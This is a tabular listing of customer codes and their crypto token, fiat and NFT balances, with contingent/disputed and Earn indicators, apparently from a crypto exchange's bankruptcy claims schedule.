| 07369701 | | DOGE[29.08125792], USD[0.00] | | |
| 07369702 | | USD[10.00] | | |
| 07369703 | | DAI[9.94904497], USD[0.00] | | |
| 07369706 | | BTC[0], USD[5.64], USDT[0] | | |
| 07369708 | | DOGE[1], GRT[4.21986598], USD[0.00] | | |
| 07369709 | | DOGE[1.68475202], TRX[371.435773], USD[474.83] | | |
| 07369710 | | CUSDT[8], DAI[.00009349], DOGE[96.92524318], GRT[131.52639052], KSHIB[115.36451747], LINK[2.27868441], LTC[1.123881], MATIC[21.3342291], SHIB[1017291.09879755], SOL[.20614596], SUSHI[2.33182901], TRX[242.24185998], USD[2.18] | Yes | |
| 07369711 | | USD[10.00] | | |
| 07369713 | | BTC[.00016922], USD[0.00] | | |
| 07369714 | | USD[10.00] | | |
| 07369715 | | USD[10.00] | | |
| 07369716 | | USD[0.00] | | |
| 07369717 | | USD[10.00] | | |
| 07369718 | | BRZ[2], BTC[0.10015085], CUSDT[3], SUSHI[1], TRX[1072.07316621], USD[3.15] | | |
| 07369719 | | USD[10.00] | | |
| 07369720 | | ETH[.00055644], ETHW[0.00055644], USD[1.94] | | |
| 07369722 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369723 | | CUSDT[1], USD[0.00] | | |
| 07369724 | | CUSDT[16], DOGE[1119.24492746], TRX[145.92279312], USD[0.00] | | |
| 07369726 | | DOGE[93.90023864], USD[0.00] | Yes | |
| 07369727 | | USD[10.00] | | |
| 07369728 | | DOGE[25.13083106], USD[0.00] | Yes | |
| 07369729 | | BAT[5], BRZ[11], CUSDT[20], GRT[5], SHIB[1], TRX[23], UNI[1], USD[0.00], USDT[3] | | |
| 07369730 | | BTC[0], SOL[0], USDT[1.57889475] | | |
| 07369731 | | USD[10.00] | | |
| 07369732 | | SUSHI[.6617764], USD[0.00] | | |
| 07369733 | | GRT[0], USD[0.00], USDT[0] | | |
| 07369734 | | USD[10.00] | | |
| 07369735 | | USD[9.86] | | |
| 07369736 | | SOL[100.00235711], USD[0.00] | | |
| 07369737 | | USD[10.00] | | |
| 07369738 | | USD[10.00] | | |
| 07369739 | | BCH[0], BTC[0], DOGE[20001], PAXG[0], SHIB[28448883.86736214], SUSHI[0], USD[0.00], USDT[1.00000001] | | |
| 07369740 | | CUSDT[1], USD[14.08] | Yes | |
| 07369741 | | USD[10.00] | | |
| 07369742 | | USD[11.92] | | |
| 07369744 | | USD[10.00] | | |
| 07369746 | | USD[10.00] | | |
| 07369747 | | ETH[.00553535], ETHW[.00553535], USD[0.00] | | |
| 07369748 | | BRZ[3], CUSDT[6], DOGE[.83747526], GRT[3.18876861], TRX[13.49563752], UNI[.02305618], USD[-0.23], USDT[.00961542] | Yes | |
| 07369749 | | USD[10.00] | | |
| 07369750 | | USD[10.00] | | |
| 07369751 | | CUSDT[6], DAI[0], USD[53.97] | | |
| 07369753 | | ETH[.00535908], ETHW[.00535908], USD[0.00] | | |
| 07369754 | | BRZ[1], CUSDT[1], DOGE[1.54636255], SUSHI[.00000666], TRX[.36682199], USD[0.00] | Yes | |
| 07369755 | | USD[10.00] | | |
| 07369756 | | USD[10.00] | | |
| 07369757 | | USD[10.00] | | |
| 07369759 | | DOGE[152.09014508], USD[0.00] | Yes | |
| 07369760 | | BTC[.00000012], USD[0.00] | | |
| 07369761 | | DOGE[13668.4714972], TRX[1], USD[20.00] | | |
| 07369762 | | BTC[.00536942], DOGE[862.000128], SHIB[4.63494025], TRX[1], USD[0.00] | | |
| 07369763 | | BRZ[3], CUSDT[7], DOGE[2], USD[0.00], USDT[0] | | |
| 07369764 | | USD[10.00] | | |
| 07369765 | | AUD[0.00], BRZ[0.00000011], CUSDT[4], DOGE[0], ETH[0], ETHW[0], GBP[0.00], SHIB[97520.56964081], SOL[0], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07369766 | | USDT[0] | | |
| 07369767 | | CUSDT[1], DOGE[0], MATIC[0], USD[0.00] | Yes | |
| 07369768 | | USD[10.00] | | |
| 07369769 | | DOGE[1555.56774834], USD[0.00] | | |
| 07369770 | | BAT[0], BRZ[1], DOGE[1], GRT[0], SOL[0], TRX[1], USD[126.47], USDT[0] | | |
| 07369772 | | USD[10.00] | | |
| 07369774 | | BCH[0], GRT[0], LINK[0], LTC[0], SUSHI[0], UNI[0] | | |
| 07369775 | | CUSDT[4], TRX[1], USD[0.00] | Yes | |
| 07369776 | | BRZ[3], SHIB[22030781.16233766], USD[0.00] | | |
| 07369777 | | DOGE[30.90656241], USD[0.00] | | |
| 07369778 | | USD[0.00] | | |
| 07369779 | | USD[0.01] | | |
| 07369780 | | USD[10.00] | | |
| 07369781 | | CUSDT[938.45500765], DOGE[500.32037963], TRX[1], USD[0.00] | | |
| 07369782 | | DOGE[17.46133462], USD[0.00] | | |
| 07369783 | | USD[0.00] | | |
| 07369784 | | DOGE[137.21513109], USD[0.00] | | |
| 07369785 | | USD[0.01] | | |
| 07369786 | | USD[10.00] | | |
| 07369787 | | SOL[19.92], USD[16.36] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369788 | | BRZ[2], CUSDT[5], DOGE[13361.8586069], GRT[17.56748981], LTC[1.01260902], SOL[1.51320478], TRX[557.12477685], USD[0.00], USDT[0] | | |
| 07369789 | Contingent, Disputed | PAXG[.00001547], USD[5.62], USDT[4.25962368] | | |
| 07369790 | | USD[0.00] | | |
| 07369792 | | USD[10.00] | | |
| 07369793 | | USD[10.00] | | |
| 07369794 | | USD[10.00] | | |
| 07369796 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07369797 | | USD[0.79] | | |
| 07369799 | | USD[0.01], USDT[0] | | |
| 07369800 | | CUSDT[1], DOGE[.00003086], TRX[2], USD[3.10] | Yes | |
| 07369801 | | USD[10.00] | | |
| 07369802 | | BRZ[1], DOGE[1], GRT[1], USD[0.00] | | |
| 07369803 | | BRZ[1], USD[0.00], USDT[0] | | |
| 07369804 | | USD[10.00] | | |
| 07369805 | | NFT (356432149584337425/Entrance Voucher #6936)[1], PAXG[0], SOL[1.91184062], USD[0.00] | | |
| 07369807 | | TRX[1], USD[0.00] | | |
| 07369808 | | DOGE[1], USD[0.00] | | |
| 07369810 | | DOGE[0], ETH[0], TRX[1], USD[0.25] | | |
| 07369811 | | USD[10.00] | | |
| 07369812 | | USD[10.00] | | |
| 07369813 | | TRX[1], USD[0.00], USDT[0] | | |
| 07369814 | | TRX[1], USD[0.00] | | |
| 07369815 | | USD[10.00] | | |
| 07369817 | | DOGE[143.37412948], USD[0.00] | | |
| 07369818 | | NFT (317658275829200692/Beasts #740 (Redeemed))[1], NFT (346432876857262891/Vintage Sahara #413 (Redeemed))[1], NFT (383097699822678782/Colossal Cacti #156 (Redeemed))[1], NFT (396432135699453231/Cosmic Creations #234 (Redeemed))[1], NFT (523421749779549464/Golden Hill #763 (Redeemed))[1], NFT (552412122147892712/Coachella x FTX Weekend 1 #3168)[1], SOL[.28243867], USD[50.00] | | |
| 07369819 | | DOGE[248.24918146], USD[2.44] | | |
| 07369820 | | BAT[1], BRZ[1], LTC[4.24599435], USD[0.01] | | |
| 07369821 | | BTC[0], CUSDT[14], TRX[4], USD[1.70] | Yes | |
| 07369822 | | USD[10.00] | | |
| 07369823 | | DOGE[26.17917551], TRX[1], USD[0.00] | | |
| 07369825 | | BRZ[2], BTC[.020785], CUSDT[25], DOGE[95.82677687], ETH[.49505204], ETHW[.49484412], LTC[.4245565], SOL[12.34084503], SUSHI[15.17731126], TRX[12.27852549], USD[0.00] | Yes | |
| 07369826 | | CUSDT[3], USD[7.20] | | |
| 07369828 | | DOGE[1], USD[0.00] | Yes | |
| 07369829 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00] | | |
| 07369831 | | DOGE[1077.89419227], USD[0.00] | | |
| 07369832 | | USD[10.00] | | |
| 07369833 | | USD[10.00] | | |
| 07369834 | | USD[1.00], USDT[0] | | |
| 07369835 | | ETH[.00588], ETHW[.00588] | | |
| 07369836 | | BTC[0.25195504], CUSDT[3], DOGE[3], ETH[.95850571], ETHW[.95810321], GRT[1], SHIB[1], SOL[57.37018614], TRX[1], USD[0.00] | Yes | |
| 07369837 | | BTC[0], ETH[.00064651], ETHW[.00064651], GRT[.8], SUSHI[.496], USD[0.88] | | |
| 07369838 | | CUSDT[3], SOL[.91417839], USD[0.00] | Yes | |
| 07369840 | | BTC[0], ETH[0], LINK[0], USD[0.00] | Yes | |
| 07369841 | | BCH[0], BRZ[1], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[0] | | |
| 07369842 | | CUSDT[1], DOGE[1969.51934968], TRX[587.13803673], USD[65.00], USDT[14.91163944] | | |
| 07369844 | | USD[0.00] | | |
| 07369846 | | DOGE[3], USD[0.00] | | |
| 07369847 | | USD[0.00] | | |
| 07369848 | | BAT[1], BRZ[4], BTC[0], CUSDT[10], DOGE[.00959937], GRT[1404.58807881], LTC[0], MATIC[639.82967061], TRX[2.00004799], USD[0.10], USDT[1.00048129] | | |
| 07369849 | | BRZ[1], CUSDT[3], DOGE[0.00001394], USD[0.00], USDT[1] | | |
| 07369852 | | BRZ[7], CUSDT[5], DOGE[62.02446282], USD[0.00] | | |
| 07369853 | | BTC[.00020436], USD[0.00] | Yes | |
| 07369854 | | CUSDT[1], DOGE[720.13869506], ETH[0.05347695], ETHW[0.05347695], USD[0.00] | | |
| 07369855 | | USD[10.00] | | |
| 07369856 | | BAT[1.0165555], BRZ[1], BTC[.00000022], CUSDT[6], TRX[78.99255705], USD[0.01] | Yes | |
| 07369857 | | USD[10.00] | | |
| 07369858 | | BRZ[5.07952967], CUSDT[9], DOGE[2], TRX[8.00087675], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369859 | | DOGE[9700.92952582], TRX[1], USD[-90.00] | Yes | |
| 07369860 | | BTC[0.00002668], ETH[0], USD[0.00] | | |
| 07369861 | | USD[10.00] | | |
| 07369862 | | DOGE[16892.52649636], SHIB[20854.09097744], USD[0.00], USDT[0.00000001] | | |
| 07369863 | | USD[10.00] | | |
| 07369864 | | BAT[0], BRZ[0], BTC[0], CUSDT[2], DOGE[0], GRT[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07369865 | | USD[10.00] | | |
| 07369866 | | DOGE[31.3908668], USD[0.00] | | |
| 07369868 | | BRZ[2], CUSDT[4], DOGE[52.15345363], TRX[1], USD[0.00] | | |
| 07369869 | | USD[10.00] | | |
| 07369870 | | USD[10.00] | | |
| 07369871 | | USD[10.00] | | |
| 07369872 | | USD[10.00] | | |
| 07369873 | | DOGE[1], TRX[1], USD[25574.19] | Yes | |
| 07369874 | | CUSDT[7], DOGE[0.00455592], ETH[.01276301], ETHW[.01259885], MATIC[56.59368306], SOL[.00000202], TRX[203.19120667], USD[0.00] | Yes | |
| 07369875 | | CUSDT[4], TRX[9], USD[0.00] | | |
| 07369877 | | CUSDT[1], DOGE[4], TRX[1], USD[0.01] | | |
| 07369878 | | DOGE[141.32016493], USD[0.00] | | |
| 07369879 | | USD[10.00] | | |
| 07369881 | | CUSDT[1], DOGE[523.69419073], USD[0.00] | | |
| 07369882 | | CUSDT[2], ETHW[.00984982], TRX[.00429522], USD[0.00] | Yes | |
| 07369883 | | BAT[4.39662797], BTC[.08297087], CUSDT[1], DOGE[16743.5566446], ETH[1.20019123], ETHW[1.19968707], GRT[4180.50868704], LTC[13.23117961], SOL[19.85329417], SUSHI[1.0995941], TRX[7], USD[0.00], USDT[3.29666071] | Yes | |
| 07369885 | | USD[10.86] | Yes | |
| 07369886 | | ETH[.000054], ETHW[.000054], USD[4.53] | | |
| 07369887 | | BAT[2.09723317], BRZ[2], CUSDT[8], DOGE[1], GRT[1.00313494], LINK[.00012154], NFT (309020886121306891/FTX - Off The Grid Miami #1138)[1], NFT (389615064209541162/Australia Ticket Stub #1387)[1], TRX[1], UNI.0000839], USD[0.00], USDT[1.09295662] | Yes | |
| 07369888 | | BRZ[1], CUSDT[13], GRT[.0005447], SHIB[3], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07369889 | | DOGE[896.30400169], GRT[1], USD[777.91] | | |
| 07369890 | | DOGE[517.24397208], USD[0.00] | | |
| 07369891 | | BTC[0.01413020], DOGE[37.44000000], LTC[0], SOL[0], SUSHI[.074], USD[0.00], USDT[0.00000143] | | |
| 07369892 | | CUSDT[1], DOGE[4298.15323049], USD[10.00] | | |
| 07369893 | | USD[10.00] | | |
| 07369894 | | BRZ[1], DOGE[5.10771881], TRX[676.33787701], USD[0.71] | Yes | |
| 07369895 | | USD[10.00] | | |
| 07369897 | | USD[10.00] | | |
| 07369898 | | DOGE[1035.23662416], USD[111.06] | Yes | |
| 07369899 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07369900 | | USD[10.00] | | |
| 07369901 | | DOGE[1], USD[0.00] | | |
| 07369902 | | CUSDT[1], USD[0.00] | Yes | |
| 07369903 | | BRZ[1], BTC[0.00502628], CUSDT[4], DOGE[243.48604478], TRX[3], USD[50.00] | | |
| 07369904 | | SOL[.4738378], USD[0.00] | Yes | |
| 07369905 | | BRZ[1], CUSDT[2], DOGE[6.22698148], GRT[93.24280217], LINK[0], MKR[0], SOL[0], SUSHI[0], TRX[4], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07369906 | | USD[10.00] | | |
| 07369907 | | BTC[.00017151], USD[0.00] | Yes | |
| 07369908 | | ETH[.07030127], ETHW[.07030127], USD[0.00] | | |
| 07369909 | | BRZ[1], BTC[0], TRX[0], USD[0.00] | | |
| 07369910 | | CUSDT[2], SHIB[1], TRX[1], USD[0.03] | | |
| 07369912 | | BTC[.0002229], CUSDT[1], DOGE[3637.01920618], ETH[.14381519], ETHW[.14381519], TRX[1], USD[0.00] | | |
| 07369913 | | BRZ[2], CUSDT[1], DOGE[1.80266298], USD[0.92] | | |
| 07369914 | | DOGE[0], USD[0.17] | | |
| 07369915 | | USD[10.00] | | |
| 07369916 | | BTC[.00020258], USD[0.00] | | |
| 07369917 | | USD[10.00] | | |
| 07369918 | | USD[10.00] | | |
| 07369919 | | BF_POINT[300], BRZ[1], CUSDT[1], DOGE[4], ETH[.07618671], ETHW[.07524228], NFT (318414868587274605/Tiger Set #2)[1], NFT (333913365437518085/Rubber Duckie #0011 - ADA)[1], NFT (401460354627057262/ Nationalelf)[1], NFT (477448275291176355/4LeafClover)[1], NFT (478596225187960121/Argentina's finest )[1], NFT (571458574607468715/Solstice #2)[1], SHIB[1], TRX[7], USD[0.00] | Yes | |
| 07369920 | | BRZ[2], CUSDT[2], DOGE[.00036793], SOL[.00000718], TRX[1], USD[0.00] | | |
| 07369921 | | DOGE[25.29178564], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369922 | | GRT[7.70449092], USD[0.00] | | |
| 07369923 | | USD[0.00] | | |
| 07369924 | | BRZ[1], CUSDT[1], DOGE[3194.15579958], USD[38.00] | | |
| 07369925 | | BAT[0], BRZ[1], BTC[0], DOGE[3.00561967], GRT[0], LINK[0], LTC[0], TRX[1], UNI[0], USD[0.00] | | |
| 07369926 | | USD[10.00] | | |
| 07369927 | | USD[10.00] | | |
| 07369928 | | USD[10.00] | | |
| 07369929 | | DOGE[71.75838835], USD[0.00] | | |
| 07369930 | | BRZ[1], CUSDT[1], DOGE[3757.05476027], SHIB[1179245.28301886], TRX[147.26723915], USD[0.00] | | |
| 07369931 | | USD[0.00] | | |
| 07369932 | | BTC[.00026522], CUSDT[6], DOGE[1918.70594786], TRX[221.96134613], USD[0.00] | Yes | |
| 07369933 | | CUSDT[2], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07369934 | | BAT[1], CUSDT[3], ETH[.00000001], ETHW[0], GRT[3], TRX[5], USD[0.52], USDT[1] | | |
| 07369935 | | DOGE[604.68453449], USD[0.00] | | |
| 07369936 | | USD[10.00] | | |
| 07369937 | | CUSDT[3], DOGE[.00007187], ETH[.07689728], ETHW[.07689728], TRX[1], USD[0.00] | | |
| 07369938 | | BAT[1], BRZ[2], CUSDT[9], DOGE[40.2560389], USD[0.01] | | |
| 07369939 | | AAVE[30.00438388], BAT[1], BRZ[1], BTC[.00000257], DOGE[3], ETH[.00000129], ETHW[0.00014198], GRT[1], MATIC[.00030778], SOL[45.83046609], TRX[2], UNI[500.86998897], USD[254.40], USDT[1.0000913] | Yes | |
| 07369940 | | USD[10.00] | | |
| 07369941 | | DOGE[1], ETH[.03070388], ETHW[.03070388], USD[10.00] | | |
| 07369942 | | BRZ[1], DOGE[0], GRT[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | | |
| 07369944 | | CUSDT[4], DOGE[1877.18813042], GRT[1], USD[583.82] | | |
| 07369945 | | DOGE[28.21035695], USD[0.00] | | |
| 07369948 | | BCH[0], BTC[0], DOGE[0.48066411], USD[0.00] | | |
| 07369949 | | CUSDT[7], DOGE[94.77743333], ETH[.00003291], ETHW[.00003291], TRX[1], USD[0.01] | | |
| 07369950 | | BAT[274.39088584], BTC[.00075704], CUSDT[12], DOGE[6984.24115624], LINK[1.04981127], SHIB[3], SOL[1.63689066], TRX[5], UNI[10.84741574], USD[74.54] | Yes | |
| 07369951 | | USD[10.00] | | |
| 07369952 | | USD[10.00] | | |
| 07369953 | | BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07369955 | | USD[10.00] | | |
| 07369956 | | BRZ[1], CUSDT[3], DOGE[1], TRX[3], USD[0.00] | | |
| 07369958 | | USD[10.00] | | |
| 07369959 | | CUSDT[3], DOGE[1], LINK[19.30338881], TRX[5], USD[0.00], USDT[1.10578624] | Yes | |
| 07369960 | | BAT[0], DOGE[0], ETH[0], GRT[0], LTC[0], MATIC[5.54093538], SUSHI[0], TRX[117.76638753], USD[0.00] | | |
| 07369961 | | CUSDT[9], DOGE[260.16819363], SHIB[98951.66407616], TRX[.00006887], USD[0.00] | Yes | |
| 07369962 | | USD[10.00] | | |
| 07369963 | | BTC[0], DOGE[31.70887407], GBP[0.00], USD[0.00] | | |
| 07369964 | | USD[10.00] | | |
| 07369965 | | USD[11.06] | Yes | |
| 07369966 | | USD[10.00] | | |
| 07369968 | | BRZ[1], CUSDT[2], GRT[1], SHIB[1], TRX[3], USD[0.01] | | |
| 07369970 | | USD[10.00] | | |
| 07369971 | | DOGE[152.67845463], USD[0.00] | | |
| 07369972 | | CUSDT[3], ETH[0.10534284], ETHW[0.10426987], GRT[1], TRX[1], USD[0.00] | Yes | |
| 07369973 | | BRZ[1], BTC[0], CUSDT[2], DOGE[0], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07369974 | | DOGE[9377.9820016], SHIB[1550388.59689922], TRX[2], USD[0.00] | | |
| 07369975 | | USD[0.00], USDT[0] | | |
| 07369976 | | USD[10.00] | | |
| 07369977 | | USD[10.00] | | |
| 07369978 | | CUSDT[1], DOGE[.00000674], USD[0.00] | | |
| 07369979 | | USD[10.00] | | |
| 07369980 | | USD[10.00] | | |
| 07369981 | | DOGE[125.11180303], USD[0.00] | | |
| 07369982 | | USD[20.00] | | |
| 07369983 | | BRZ[1], DOGE[0], SOL[0], USD[0.01] | | |
| 07369984 | | USD[10.00] | | |
| 07369985 | | USD[10.00] | | |
| 07369986 | | BTC[.00224014], DOGE[1452.35191636], ETH[.00806532], ETHW[.00796949], USD[0.30] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369987 | | USD[0.00] | | |
| 07369989 | | USD[10.00] | | |
| 07369990 | | DOGE[99.79501145], SHIB[95393.16691103], USD[0.00] | Yes | |
| 07369991 | | DOGE[58.72619363], USD[0.00] | Yes | |
| 07369992 | | USD[10.00] | | |
| 07369993 | | DOGE[2.13268166], USD[0.00] | | |
| 07369994 | | USD[10.00] | | |
| 07369995 | | BRZ[7.04608703], BTC[0], CUSDT[11], DAI[0], ETHW[1.56113434], GRT[346.77046391], SHIB[0], TRX[2], UNI[.00047214], USD[0.01] | Yes | |
| 07369998 | | BAT[15.35722565], BRZ[26.83343323], CUSDT[1], DOGE[96.89670209], GRT[5.99436548], SOL[.43803162], TRX[58.88967637], USD[-15.00] | | |
| 07369999 | | CUSDT[5], TRX[3], USD[0.00], USDT[0] | | |
| 07370000 | | BTC[.00001996], CUSDT[3], DOGE[ 30162304], TRX[1], USD[0.00] | | |
| 07370001 | | BRZ[3], BTC[0], CUSDT[7], TRX[6], USD[0.19] | | |
| 07370003 | | BRZ[1], CUSDT[4], KSHIB[.0000168], MATIC[0], SHIB[.63561707], SOL[.00078512], USD[0.37] | Yes | |
| 07370004 | | USD[10.99] | Yes | |
| 07370005 | | USD[10.00] | | |
| 07370006 | | USD[10.00] | | |
| 07370007 | | USD[10.00] | | |
| 07370008 | | AVAX[.0000224], BAT[42.15339728], BRZ[1], CUSDT[20], DAI[0], DOGE[6], GRT[143.97623013], LINK[0.00000597], MATIC[9.15299002], SHIB[31], SOL[0], TRX[9], USD[0.00], USDT[0.00000001] | Yes | |
| 07370010 | | USD[32.93] | | |
| 07370011 | | DOGE[1], TRX[1], USD[0.08] | | |
| 07370012 | | CUSDT[2], SOL[.55847684], USD[0.01] | Yes | |
| 07370013 | | CUSDT[1], USD[0.00] | | |
| 07370014 | | USD[10.00] | | |
| 07370015 | | DOGE[1], GRT[454.16247221], USD[0.00] | | |
| 07370016 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07370017 | | USD[10.00] | | |
| 07370018 | | CUSDT[2], DOGE[720.85719989], ETH[.00390927], ETHW[.00390927], USD[0.00] | | |
| 07370019 | | USD[10.00] | | |
| 07370020 | | USD[10.69] | Yes | |
| 07370021 | | USD[0.05], USDT[0] | | |
| 07370022 | | USD[10.00] | | |
| 07370023 | | BTC[0.00078112], DOGE[0], ETH[0], LINK[0], USD[0.33] | Yes | |
| 07370024 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | | |
| 07370026 | | USD[10.00] | | |
| 07370027 | | USD[10.00] | | |
| 07370028 | | USD[10.00] | | |
| 07370029 | | USD[10.00] | | |
| 07370030 | | CUSDT[1], DOGE[178.92691806], USD[0.33] | | |
| 07370031 | | CUSDT[4], DOGE[237.25951345], SUSHI[0], TRX[1], USD[0.00] | | |
| 07370032 | | DOGE[593.44354047], TRX[1082.21466335], USD[0.00] | | |
| 07370033 | | BTC[.0002325], CUSDT[8], DOGE[2955.23886434], ETH[.01118902], ETHW[.01118902], SHIB[726287.19204144], TRX[144.03217786], USD[0.00] | | |
| 07370034 | | SHIB[1], USD[0.01] | | |
| 07370035 | | USD[10.00] | | |
| 07370036 | | BAT[1], CUSDT[1], GRT[1], TRX[2], USD[0.01] | | |
| 07370037 | | USD[10.00] | | |
| 07370038 | | CUSDT[1], DOGE[76.7398372], TRX[1.01044675], USD[0.00] | Yes | |
| 07370039 | | USD[10.00] | | |
| 07370041 | | USD[10.00] | | |
| 07370042 | | CUSDT[2], DOGE[38.57978144], TRX[1], USD[0.00] | Yes | |
| 07370043 | | USD[10.00] | | |
| 07370044 | | USD[10.00] | | |
| 07370045 | | BF_POINT[300], BRZ[5], BTC[.00000037], ETHW[.95152715], NFT (33610652938937325 7/The 2974 Collection #2551)[1], SHIB[71], TRX[.19151038], UNI[.00026056], USD[42.29] | Yes | |
| 07370046 | | USD[0.00] | | |
| 07370047 | | USD[10.00] | | |
| 07370048 | | USD[10.00] | | |
| 07370049 | | DOGE[1], USD[0.00] | | |
| 07370050 | | USD[10.00] | | |
| 07370052 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370053 | | MATIC[458.16], USD[0.58] | | |
| 07370054 | | USD[10.00] | | |
| 07370055 | | USD[10.00] | | |
| 07370056 | | CUSDT[14], DOGE[1], LTC[.04435068], SHIB[145313.49112112], SOL[.05364224], USD[0.00] | | |
| 07370057 | | CUSDT[2], DOGE[3], TRX[0], USD[0.01], USDT[0.72420000] | | |
| 07370058 | | USD[0.00] | Yes | |
| 07370059 | | CUSDT[4], USD[158.24] | | |
| 07370060 | | DOGE[279.65840173], USD[0.00] | Yes | |
| 07370061 | | DOGE[14889.22280465], USD[0.00], USDT[0] | | |
| 07370062 | | USD[0.00] | | |
| 07370065 | | TRX[2], USD[0.00] | | |
| 07370066 | | USD[10.00] | | |
| 07370068 | | BTC[.00015597], USD[0.00] | | |
| 07370069 | | USD[10.00] | | |
| 07370070 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07370071 | | USD[10.00] | | |
| 07370072 | | DOGE[1], USD[0.00] | | |
| 07370073 | | SHIB[253.97502081], USD[0.00], USDT[0] | Yes | |
| 07370074 | | USD[10.00] | | |
| 07370075 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.01] | | |
| 07370076 | | SHIB[110922.10566451], USD[0.00] | | |
| 07370077 | | USD[10.00] | | |
| 07370078 | | USD[10.00] | | |
| 07370079 | | USD[0.00] | | |
| 07370080 | | USD[10.00] | | |
| 07370081 | | DOGE[25.82237752], USD[0.00] | | |
| 07370082 | | USD[10.00] | | |
| 07370083 | | USD[0.77], USDT[.52906] | | |
| 07370084 | | BAT[.15979259], BTC[0.00400692], CUSDT[2], DOGE[62.60241736], LTC[.33904593], TRX[2], USD[0.01] | Yes | |
| 07370085 | | ETH[.00562394], ETHW[.00562394], USD[0.00] | | |
| 07370086 | | DOGE[3142.40229224], USD[0.00] | | |
| 07370087 | | CUSDT[1], DOGE[1], SHIB[88.76253116], TRX[8], USD[0.01] | Yes | |
| 07370089 | | USD[10.00] | | |
| 07370090 | | BRZ[1], BTC[.03399114], CUSDT[1], SHIB[3], USD[0.01], USDT[1.02543197] | Yes | |
| 07370093 | | DOGE[3], USD[0.00] | | |
| 07370094 | | USD[10.00] | | |
| 07370095 | | BAT[3.19507889], BRZ[4], CUSDT[8], GRT[2.02558517], TRX[9], USD[0.00], USDT[2.15369817] | | |
| 07370096 | | BCH[0.00000001], BF_POINT[1400], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0.00000001], ETHW[0.00009347], GRT[0], LINK[0], LTC[0], NFT (29266217271987653/The Hill by FTX #6524)[1], SHIB[7], SOL[0], TRX[0.01021801], USD[0.34], USDT[0.00000001], YFI[0] | Yes | |
| 07370097 | | USD[10.00] | | |
| 07370099 | | CUSDT[3], DOGE[443.07611447], TRX[1], USD[4.89] | Yes | |
| 07370100 | | USD[0.73] | | |
| 07370101 | | USD[10.00] | | |
| 07370102 | | DOGE[122.87699275], USD[0.00] | | |
| 07370103 | | BRZ[0], BTC[0], USD[0.00] | | |
| 07370104 | | BAT[0], CUSDT[1], DOGE[1], ETH[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07370105 | | BTC[.00023266], USD[0.00] | | |
| 07370106 | | USD[10.92] | Yes | |
| 07370107 | | BTC[0], CUSDT[1], DOGE[1], SUSHI[0], USD[10.00] | | |
| 07370108 | | DOGE[151.02426279], TRX[1], USD[0.00] | Yes | |
| 07370109 | | USD[0.00] | | |
| 07370110 | | USD[10.00] | | |
| 07370111 | | USD[10.00] | | |
| 07370112 | | DOGE[539.61988143], USD[0.00] | | |
| 07370114 | | USD[10.00] | | |
| 07370115 | | BRZ[1], USD[0.00] | | |
| 07370116 | | USD[10.00] | | |
| 07370117 | | BCH[0], BTC[0], DOGE[0.00000001], ETH[0], ETHW[0], GRT[0], LTC[0], PAXG[0], SHIB[12889241.36821447], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07370118 | | BRZ[1], CUSDT[13], TRX[2], USD[0.50] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370120 | | ETH[.000073], ETHW[.000073], USD[9.67] | | |
| 07370121 | | USD[10.00] | | |
| 07370123 | | CUSDT[2], DOGE[0], TRX[2], USD[0.00] | | |
| 07370124 | | DOGE[75.5875225], USD[0.10] | | |
| 07370125 | | USD[10.00] | | |
| 07370126 | | USD[10.00] | | |
| 07370127 | | CUSDT[1], SUSHI[19.1243283], USD[10.00] | | |
| 07370128 | | BAT[2.05835379], BRZ[10.84619882], CUSDT[28], DOGE[9.41097515], GRT[2.04425147], NFT (498095508993042806/FTX - Off The Grid Miami #461)[1], SHIB[7], SOL[99.43613891], TRX[11], USD[0.00], USDT[1.07346807] | Yes | |
| 07370129 | | BTC[0], DOGE[0], GRT[2.27928365], USD[0.56], USDT[4] | | |
| 07370130 | | ETH[.00377341], ETHW[.00377341], USD[2.50] | | |
| 07370131 | | CUSDT[1], DOGE[324.47059144], TRX[1], USD[0.00] | Yes | |
